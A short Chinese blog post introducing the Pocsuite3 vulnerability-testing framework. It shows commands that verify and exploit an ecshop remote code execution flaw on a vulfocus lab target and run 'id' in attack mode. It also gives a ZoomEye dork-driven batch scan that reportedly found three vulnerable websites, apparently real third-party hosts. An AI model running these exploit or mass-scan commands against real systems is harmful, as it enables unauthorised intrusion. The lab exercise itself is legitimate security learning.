介紹
Pocsuite 是由知道創宇404實驗室打造的一款開源的遠程漏洞測驗框架,它是知道創宇安全研究團隊發展的基石,是團隊發展至今一直維護的一個專案,保障了我們的 Web 安全研究能力的領先,
你可以直接使用 Pocsuite 進行漏洞的驗證與利用;你也可以基于 Pocsuite 進行 PoC/Exp 的開發,因為它也是一個 PoC 開發框架;同時,你還可以在你的漏洞測驗工具里直接集成 Pocsuite,它也提供標準的呼叫類,
安裝
github下載鏈接:
https://github.com/knownsec/pocsuite3/archive/master.zip
下載后解壓即可
簡單使用
使用vulfocus靶場進行測驗,以ecshop 2.x/3.x SQL注入/代碼執行 為例:
進入指定目錄
進入cmd
使用命令檢測靶場是否存在該漏洞
python cli.py -r pocs/ecshop_rce.py -u “http://vulfocus.fofa.so:10226/” --verify
成功檢測出目標存在該漏洞
使用攻擊模式,執行命令id
python cli.py -r pocs/ecshop_rce.py -u “http://vulfocus.fofa.so:55647/” --attack --command ‘id’
命令執行成功
一個批量掃描漏洞的例子:
將使用ZoomEye搜索ecshop并使用 ecshop_rce.py 探測,指定執行緒數量為5
python cli.py -r pocs/ecshop_rce.py --dork ecshop --threads 5
掃出來了三個網站存在該漏洞
總結
以上是對Pocsuite的安裝和簡單使用,關于shell互動模式沒有測驗成功,以后再試
學習Pocsuite的使用主要是為了學習對poc的撰寫,正在對該腳本進行分析,希望早日熟悉Pocsuite腳本的撰寫,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/394154.html
標籤:其他
下一篇:密碼學基礎自研